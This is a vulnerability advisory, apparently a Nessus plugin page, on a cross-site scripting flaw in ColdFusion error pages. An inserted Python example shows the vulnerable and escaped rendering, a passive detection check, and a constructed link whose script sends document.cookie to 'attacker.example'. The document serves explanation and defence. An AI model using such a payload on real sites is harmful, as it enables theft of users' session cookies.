ColdFusion Error Page XSS

Medium Nessus Network Monitor Plugin ID 2893

Synopsis

The remote host is running a vulnerable version of Macromedia ColdFusion, a web application server.

Description

The remote host is running Macromedia ColdFusion, a web application server. This version of ColdFusion is vulnerable to a cross-site scripting (XSS) flaw in the way it displays error pages. To exploit this flaw, an attacker would need to convince a user to browse to a malicious URI. Further, the affected ColdFusion installation would need to be serving requests through the bundled JRun web server (installed by default, but not recommended for production use). Successful exploitation could result in the loss of confidential data, such as authentication cookies.
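The plugin text does not name the affected parameter or the exact error handler, so the following is an added, generic illustration of the class of flaw it describes (a request value echoed into an error page without output encoding) and of the fix (HTML-escaping the reflected value). It is example code, not ColdFusion, JRun or Tenable code; the error-page layout, the request path and the cookie-stealing payload are constructed for this example.

```python
"""Added example: reflected XSS in a server-generated error page.

The request path, page markup and payload below are constructed for
illustration; they are not taken from ColdFusion or from the plugin.
"""
import html
import re
from urllib.parse import unquote

# Constructed malicious link: the victim is lured into requesting a path that
# does not exist, carrying a script that ships document.cookie to the attacker.
SAMPLE_PATH = (
    "/missing.cfm%3Cscript%3Edocument.location%3D%27http%3A//attacker.example/"
    "%3F%27%2Bdocument.cookie%3C/script%3E"
)

ERROR_TEMPLATE = (
    "<html><body><h1>404 Not Found</h1>"
    "<p>The requested resource {path} was not found.</p></body></html>"
)


def render_error_vulnerable(request_path: str) -> str:
    """Error page that interpolates the decoded request path verbatim (the flaw)."""
    return ERROR_TEMPLATE.format(path=unquote(request_path))


def render_error_hardened(request_path: str) -> str:
    """Same page, but the attacker-controlled value is HTML-escaped first.

    quote=True also escapes ' and " so the value is safe inside attributes."""
    return ERROR_TEMPLATE.format(path=html.escape(unquote(request_path), quote=True))


# Any tag-like fragment in the decoded request, e.g. <script> or </script>.
TAG_RE = re.compile(r"<[a-zA-Z/][^>]*>")


def reflects_markup(request_path: str, response_body: str) -> bool:
    """Simplified passive check in the spirit of a network monitor: does markup
    supplied in the request come back unchanged (unencoded) in the response?

    Simplification: a tag that legitimately appears in the page (e.g. <p>)
    would be a false positive; a real check would compare positions too."""
    tags = TAG_RE.findall(unquote(request_path))
    return any(tag in response_body for tag in tags)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_error_vulnerable),
                         ("hardened", render_error_hardened)):
        body = render(SAMPLE_PATH)
        print(f"{name}: reflected markup = {reflects_markup(SAMPLE_PATH, body)}")
```

Encoding the reflected value is the fix for the page itself; marking session cookies HttpOnly is a separate, complementary control that keeps injected script from reading them even where a reflection is missed.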

Solution

Upgrade or patch according to vendor recommendations.

See Also

http://www.macromedia.com/go/mpsb05-03

Plugin Details

Severity: Medium

ID: 2893

Family: Web Servers

Published: 2005/05/11

Modified: 2016/01/21

Dependencies: 2804, 2805

Risk Information

Risk Factor: Medium

CVSSv2

Base Score: 4.3

Temporal Score: 3.7

Vector: CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N

Temporal Vector: CVSS2#E:H/RL:OF/RC:C

CVSSv3

Base Score: 5.3

Temporal Score: 5.1

Vector: CVSS3#AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Temporal Vector: CVSS3#E:H/RL:O/RC:X

Reference Information

BID: 13581